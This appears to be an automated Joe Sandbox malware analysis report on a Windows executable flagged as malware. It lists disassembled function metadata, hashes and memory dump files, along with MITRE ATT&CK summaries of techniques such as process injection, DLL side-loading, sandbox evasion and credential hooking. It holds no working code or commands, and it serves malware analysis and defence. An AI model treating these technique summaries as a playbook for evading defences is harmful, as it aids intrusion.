Opcode ID: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
Instruction ID: 8fc489eb381e7bcb632bc929c7458c6af63f0578bd8b1b8b82e37a912717b1ed
Opcode Fuzzy Hash: 19a090d337b5289cb2aa2f64d74c49aadee50cee4b888bae0250ae30ba76a082
Instruction Fuzzy Hash: B6014F3C9022098BCF749F65C446F6EB3B9EF50315F14482FE881A6351CB3A9984DB89

Function 00452999 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0045296C
_sprintf.LIBCMT ref: 0045297C

Strings

0x%08X, xrefs: 00452976

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LongWindow_sprintf
String ID: 0x%08X
API String ID: 3628546561-3182613153
Opcode ID: 2faf8e32b2b16b8a465df49938bc8899e318f2bdd98a295d6bbf45abaa039b98
Instruction ID: 6acdf981117a852a9e5cd47a90b4ac157c07043d223c02b1d0fa02312434e3a0
Opcode Fuzzy Hash: 2faf8e32b2b16b8a465df49938bc8899e318f2bdd98a295d6bbf45abaa039b98
Instruction Fuzzy Hash: FEF0277264420476DA10E2949C42FEE7328EB9A721F30831BB621B60C1C6A92506835D

Function 0046CA80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0046CAC6
DestroyCursor.USER32(00000000), ref: 0046CAE0

Strings

0, xrefs: 0046CA9B

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CursorDeleteDestroyObject
String ID: 0
API String ID: 1476932828-4108050209
Opcode ID: 8196a33480f324182731231db9199d3584671200d8ed1f6f1dab9045bccc0b4e
Instruction ID: 8356b675d2cd7c6f0315867098d976f9415729bd3af46a82be1a2a63fffa691c
Opcode Fuzzy Hash: 8196a33480f324182731231db9199d3584671200d8ed1f6f1dab9045bccc0b4e
Instruction Fuzzy Hash: 8FF062F05053019FE724DF55CA58B177BE4BB58704F440A2DE4DA87390E7B9E808CB9A

Function 00452969 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 0045296C
_sprintf.LIBCMT ref: 0045297C

Strings

0x%08X, xrefs: 00452976

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: LongWindow_sprintf
String ID: 0x%08X
API String ID: 3628546561-3182613153
Opcode ID: b7fc6e8ab338009bdc88e8da7ee8c3674c20d95f4d878235ea311d4f0567188c
Instruction ID: d0788ef7bb7b7bf832c5a97ab4ba72a9873196184a26d8f889ddb45ad318b410
Opcode Fuzzy Hash: b7fc6e8ab338009bdc88e8da7ee8c3674c20d95f4d878235ea311d4f0567188c
Instruction Fuzzy Hash: C5F0E57264420476DA10E7D4AC42FEE7338EB89734F70831BB630761C1CAA96915839D

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.FileRepMalware.1111.23697.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\Desktop\netcomp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.1111.23697.exe

Function 00452C79 Relevance: 3.1, APIs: 2, Instructions: 82
networkCOMMON

Function 004757E0 Relevance: 1.7, APIs: 1, Instructions: 154
COMMON

Function 00417326 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 95
COMMON

Function 00403F40 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 265
COMMON

Function 004C6697 Relevance: 10.6, APIs: 7, Instructions: 105
COMMONLIBRARYCODE

Function 00430F21 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 82
COMMON

Function 0041739C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 67
COMMON

Function 00452A10 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 221
COMMON

Function 0048A68C Relevance: 4.6, APIs: 3, Instructions: 130
COMMON

Function 004042F5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Function 004C54C0 Relevance: 3.1, APIs: 2, Instructions: 52
COMMONLIBRARYCODE

Function 00417828 Relevance: 1.6, APIs: 1, Instructions: 109
timeCOMMON

Function 004177FE Relevance: 1.6, APIs: 1, Instructions: 78
timeCOMMON